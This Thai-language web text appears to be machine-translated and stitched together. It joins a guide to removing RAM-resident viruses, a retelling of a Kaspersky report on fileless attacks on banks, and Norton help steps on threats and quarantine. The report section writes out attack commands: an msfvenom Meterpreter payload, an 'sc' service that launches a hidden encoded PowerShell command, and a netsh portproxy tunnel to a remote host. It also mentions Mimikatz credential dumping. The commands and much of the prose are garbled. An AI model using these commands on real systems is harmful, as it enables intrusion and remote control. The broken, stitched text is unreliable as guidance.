ไวรัสเข้า หน่วยความจำเข้าถึงโดยสุ่มปรากฏการณ์นี้ค่อนข้างไม่เป็นที่พอใจและน่าเสียดายที่หาได้ยาก บ่อยครั้งที่เราเห็นไฟล์ที่ซ่อนอยู่ แต่เราไม่สามารถลบได้ แต่อย่างใด - มันยังคงปรากฏและปรากฏขึ้นหรือระบบปฏิบัติการเอง ระบบวินโดวส์ไม่อนุญาต
อย่างไรก็ตามมันปรากฏตัวบ่อยกว่าในกรณีต่างๆ ตั้งค่าผิดป้องกันไวรัสหรือขาดมัน หากคุณมีสถานการณ์เช่นนี้ ฉันขอแนะนำให้คุณอ่านบทความ - การติดตั้งและกำหนดค่าโปรแกรมป้องกันไวรัสบน Windows ก่อนที่คุณจะลบไวรัสออกจาก RAM คุณควรทราบว่าเกิดอะไรขึ้นกับโปรแกรมป้องกันไวรัสที่ติดตั้งในคอมพิวเตอร์ของคุณ เป็นไปได้มากว่าโปรแกรมป้องกันไวรัสของคุณถูก "ทำลาย" โดยไวรัสที่ปรากฏ นอกจากนี้ อาจเป็นไปได้ว่าในคลังลายเซ็นของโปรแกรมป้องกันไวรัสของคุณไม่มีวิธีการใดที่จะลบไวรัสออกจากการรวบรวมในเวลาที่เหมาะสมและโปรแกรมจะพยายามลบออกเท่านั้น การติดเชื้อไวรัส ไม่ใช่ตัวไวรัสเอง
บ่อยครั้งที่มีสถานการณ์ที่ไวรัสถ่ายโอนโปรแกรมและไฟล์เพิ่มเติมสำหรับงานของตัวเองหรือเริ่มทำงานโดยอัตโนมัติและตอนนี้โปรแกรมป้องกันไวรัสจะตรวจจับสำเนาเหล่านี้ แต่จะตรวจไม่พบซอร์สโค้ด (ไวรัส) และในกรณีส่วนใหญ่ไม่สามารถรับมือกับ มัน.
- เราลบ (โดยใช้โปรแกรมถอนการติดตั้ง - เพิ่ม / ลบโปรแกรม) โปรแกรมป้องกันไวรัสที่ติดตั้งไว้ มันไม่มีประโยชน์ที่นี่
- ดาวน์โหลด Ccleaner จากอินเทอร์เน็ตและติดตั้ง มาเริ่มกันเลย ก่อนอื่นเราจะล้างโฟลเดอร์ temp ซอฟต์แวร์นี้เหมาะสำหรับผู้ใช้ทั่วไป ดังนั้นจึงเป็นไปได้ที่จะทำเครื่องหมายในช่องทั้งหมดในการตั้งค่า - มันจะไม่ลบข้อมูลผู้ใช้! ฉันเขียนเพิ่มเติมเกี่ยวกับโปรแกรมในบทความ - การทำความสะอาดรีจิสทรี
- จากนั้นเราต้องการยูทิลิตี้ล้างไวรัสเพื่อช่วยเรา ฉันเขียนเกี่ยวกับพวกเขาในบทความ - ยูทิลิตี้ฟรีสำหรับการลบไวรัส เราเลือกอะไรก็ได้ เช่น ดาวน์โหลดโปรแกรม Dr.web Cure it จากอินเทอร์เน็ตแล้วติดตั้ง
- เราติดตั้งการอัปเดตเรียกใช้หนึ่งในสองการสแกน (เร็วหรือเต็ม) โดยหลักการแล้วการสแกนอย่างรวดเร็วจะให้ผลลัพธ์ที่มีประสิทธิภาพ ไวรัสทั้งหมดที่ตรวจพบจะถูกลบออก เรารีสตาร์ทคอมพิวเตอร์
- กำลังดาวน์โหลดโปรแกรมป้องกันไวรัสใหม่ พื้นฐานสำคัญ! หากก่อนเกิดปัญหา คุณได้ติดตั้งโปรแกรมป้องกันไวรัส Eset NOD32 แล้ว จากนั้นติดตั้ง Avast หรือ Avira หากติดตั้ง Avast ไว้ ให้ติดตั้ง Eset หรือโปรแกรมป้องกันไวรัสอื่นๆ ที่คุณเลือก
- มันค่อนข้างง่ายที่จะตีความการกระทำดังกล่าว โปรแกรมป้องกันไวรัสที่คุณน่าจะเสียหาย ข้อมูลในรีจิสทรีอาจยังคงอยู่ และจะนำไปสู่การทำงานที่ไม่ถูกต้องของโปรแกรมป้องกันไวรัส โดยเฉพาะอย่างยิ่งเมื่อโปรแกรมป้องกันไวรัสนี้ไม่พบ ภัยคุกคามจากอินเทอร์เน็ตบนคอมพิวเตอร์ของคุณ
เกี่ยวกับแคมเปญมัลแวร์ใหม่ที่น่าสนใจซึ่งส่งผลกระทบต่อธนาคาร โทรคมนาคม หน่วยงานรัฐบาล ตลอดจนบริษัทและองค์กรอื่นๆ ในกว่า 40 ประเทศทั่วโลก
นักวิเคราะห์ของทีม GReAT เขียนว่าทีมรักษาความปลอดภัยของธนาคารเป็นคนแรกที่สังเกตเห็นภัยคุกคาม จากนั้นจึงพบรหัส Meterpreter ในหน่วยความจำกายภาพของตัวควบคุมโดเมน ผลิตภัณฑ์ของ Kaspersky Lab ตรวจพบปัญหาต่างๆ เช่น MEM:Trojan.Win32.Cometer และ MEM:Trojan.Win32.Metasploit เมื่อนักวิเคราะห์เริ่มค้นหาว่ารหัสมาจากที่ใดในหน่วยความจำ พวกเขายังพบสคริปต์ PowerShell ในรีจิสทรีของ Windows และยูทิลิตี้ NETSH ซึ่งใช้ในการรับส่งข้อมูลไปยังเซิร์ฟเวอร์คำสั่งและเซิร์ฟเวอร์ควบคุมของผู้โจมตี
การโจมตีดังกล่าวเรียกว่า "ไร้ไฟล์" (ไร้ไฟล์) กล่าวคือ มัลแวร์จะไม่วางไฟล์ใดๆ ไว้ในฮาร์ดไดรฟ์ แต่เพย์โหลดจะฝังอยู่ในหน่วยความจำโดยตรงและอยู่ภายใน RAM แน่นอนว่าการตรวจจับและติดตามการโจมตีดังกล่าวเป็นเรื่องยากมาก
รูปแบบการโจมตี
นักวิจัยอธิบายว่า Metasploit framework ที่รู้จักกันอย่างกว้างขวางสามารถใช้สร้างสคริปต์ได้ ดังตัวอย่างด้านล่าง
สคริปต์เช่นนี้ช่วยฉีด Meterpreter ลงใน RAM สามารถใช้ Msfvenom จาก Metasploit เพื่อสร้าง:
Msfvenom -p windows/meterpreter/bind_hidden_tcp AHOST=10.10.1.11 -f psh-cmd
เมื่อสร้างสคริปต์แล้ว ผู้โจมตีจะใช้ Windows SC เพื่อติดตั้งบริการที่เป็นอันตรายบนโฮสต์เป้าหมาย (ซึ่งจะเรียกใช้สคริปต์ด้านบนในที่สุด) สามารถทำได้โดยใช้คำสั่งต่อไปนี้:
sc \\target_name สร้าง ATITscUA binpath= “C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w ซ่อน e aQBmACgAWwBJAG4AdABQAHQA…” start= manual
ขั้นตอนต่อไปคือการตั้งค่าช่องสัญญาณเพื่อให้เครื่องที่ติดไวรัสพร้อมใช้งานสำหรับรีโมตโฮสต์ ในการทำเช่นนี้ ผู้โจมตีจะใช้คำสั่งต่อไปนี้:
portproxy อินเตอร์เฟส netsh เพิ่ม v4tov4 listenport=4444 connectaddress=10.10.1.12 connectport=8080 listenaddress=0.0.0.0
ด้วยเหตุนี้ การรับส่งข้อมูลเครือข่ายทั้งหมดจาก 10.10.1.11:4444 จะถูกเปลี่ยนเส้นทางไปยัง 10.10.1.12:8080 เทคนิคนี้ช่วยให้คุณตั้งค่าอุโมงค์พร็อกซีซึ่งอาชญากรสามารถควบคุมโฮสต์ PowerShell ที่ติดไวรัสได้จากระยะไกล
นักวิเคราะห์ทราบว่าการใช้ SC และ NETSH นั้นต้องการสิทธิ์ของผู้ดูแลระบบบนโฮสต์ในพื้นที่และระยะไกล การใช้สคริปต์ PowerShell ที่เป็นอันตรายจะต้องมีการยกระดับสิทธิ์และการเปลี่ยนแปลงนโยบายการดำเนินการ ในการทำเช่นนี้ ผู้โจมตีจะใช้ Mimikatz credential dumper เพื่อรวบรวมรหัสผ่านจากบัญชีในเครื่องและเวิร์กสเตชันรอบข้าง
หลังจากศึกษาการโจมตีธนาคารที่ได้รับผลกระทบอย่างรอบคอบแล้ว นักวิจัยได้ข้อสรุปว่าผู้ดำเนินการแคมเปญนี้ใช้โดเมนระดับที่สาม เช่นเดียวกับโดเมนในโซน .GA, .ML, .CF ความจริงก็คือโดเมนดังกล่าวไม่มีค่าใช้จ่าย ซึ่งหมายความว่าผู้โจมตีจะไม่ทิ้งข้อมูล WHOIS ไว้เบื้องหลัง
สรุปทั้งหมดข้างต้น (โดยใช้ Metasploit และ สาธารณูปโภคมาตรฐาน Windows, โดเมนที่ไม่มีข้อมูล WHOIS) นักวิจัยสรุปได้ว่าลายมือของผู้โจมตีที่ไม่รู้จักมีความคล้ายคลึงกับงานของกลุ่มต่างๆ เช่น GCMAN และ Carbanak อย่างไรก็ตาม ไม่มีหลักฐานโดยตรง ดังนั้นจึงไม่สามารถเชื่อมโยงการโจมตีแบบเงียบเหล่านี้กับกลุ่มใดกลุ่มหนึ่งได้
“เทคนิคเช่นที่อธิบายไว้ในรายงานนี้มีมากขึ้น โดยเฉพาะอย่างยิ่ง [เมื่อมีการโจมตี] กับเป้าหมายขนาดใหญ่ในอุตสาหกรรมการธนาคาร น่าเสียดายที่การใช้เครื่องมือง่ายๆ รวมกับกลเม็ดต่างๆ ทำให้ยากต่อการตรวจจับ [การโจมตีดังกล่าว]" ผู้เชี่ยวชาญ GReAT สรุป
เมื่อ Norton ตรวจพบภัยคุกคาม โปรแกรมจะทำการลบออกโดยอัตโนมัติ เว้นแต่การแทรกแซงของคุณมีความจำเป็นเพื่อกำหนดวิธีการจัดการกับภัยคุกคาม ในกรณีดังกล่าว Norton จะแสดงการแจ้งเตือน "ภัยคุกคามที่ตรวจพบ" หรือ "ภัยคุกคามด้านความปลอดภัย" พร้อมตัวเลือกที่มีให้เพื่อตอบสนองต่อภัยคุกคาม
ดูภัยคุกคามที่ได้รับการแก้ไขโดยอัตโนมัติระหว่างการสแกน
เปิดตัว Norton
ความปลอดภัยของอุปกรณ์คลิกเปิด
ในหน้าต่าง บันทึกความปลอดภัย แก้ไขภัยคุกคามด้านความปลอดภัยแล้ว.
เลือกภัยคุกคามจากรายการและดูการดำเนินการที่เสร็จสมบูรณ์ในแผงรายละเอียด
ในบางกรณี แทนที่จะแก้ไขภัยคุกคามโดยอัตโนมัติ Norton ขอแนะนำให้คุณดำเนินการบางอย่างเพื่อแก้ไข
แก้ไขภัยคุกคามที่ไม่ได้รับการแก้ไขระหว่างการสแกน
เปิดตัว Norton
หากหน้าต่าง My Norton ปรากฏขึ้นถัดจาก ความปลอดภัยของอุปกรณ์คลิกเปิด
ในหน้าต่างหลักของ Norton ให้คลิกสองครั้งที่ Security แล้วเลือก History
ในหน้าต่าง บันทึกความปลอดภัยในรายการ แสดง ให้เลือก ภัยคุกคามด้านความปลอดภัยที่ไม่ได้รับการแก้ไข.
หากรายการมีภัยคุกคามที่ยังไม่ได้แก้ไข ให้เลือกภัยคุกคามที่คุณสนใจ
หากมีเหตุผลให้เชื่อได้ว่าระบบติดไวรัส ให้เรียกใช้ Norton Power Eraser Norton Power Eraser เป็นเครื่องมือกำจัดมัลแวร์ที่ทรงพลังเพื่อกำจัดภัยคุกคามด้านความปลอดภัยที่ทนทานที่สุด สำหรับข้อมูลเพิ่มเติม โปรดดูที่ เรียกใช้ Norton Threat Scan บนพีซีของคุณ
Norton Power Eraser เป็นเครื่องมือกำจัดมัลแวร์ที่ทำงานในโหมดก้าวร้าว บางครั้งพร้อมกับมัลแวร์ Norton Power Eraser สามารถลบไฟล์ที่ถูกต้องได้ ดังนั้นควรตรวจสอบผลการสแกนอย่างละเอียดก่อนที่จะลบไฟล์ใดๆ
ตามค่าเริ่มต้น Norton จะลบภัยคุกคามด้านความปลอดภัยออกจากคอมพิวเตอร์ของคุณและกักกัน หากมีเหตุผลให้เชื่อได้ว่าไฟล์ถูกลบโดยไม่ได้ตั้งใจ ไฟล์นั้นสามารถกู้คืนจากการกักกันไปยังตำแหน่งเดิมและแยกออกจากการสแกนในภายหลัง
กู้คืนไฟล์จากการกักกัน
เปิดตัว Norton
หากหน้าต่าง My Norton ปรากฏขึ้นถัดจาก ความปลอดภัยของอุปกรณ์คลิกเปิด
ในหน้าต่างหลักของ Norton ให้คลิก Security แล้วเลือก History
ในหน้าต่าง บันทึกความปลอดภัยขยายเมนูแสดงและเลือกตัวเลือกกักกัน
เลือกไฟล์ที่จะกู้คืน
ในแผงรายละเอียด คลิกตัวเลือก
ในหน้าต่าง ตรวจพบภัยคุกคามเลือกทีม กู้คืนและแยกไฟล์นี้.
ในหน้าต่าง การกู้คืนจากการกักกันคลิกปุ่มใช่
ในหน้าต่าง เรียกดูโฟลเดอร์ เลือกโฟลเดอร์หรือไดรฟ์เพื่อวางไฟล์ที่กู้คืน จากนั้นคลิก ตกลง
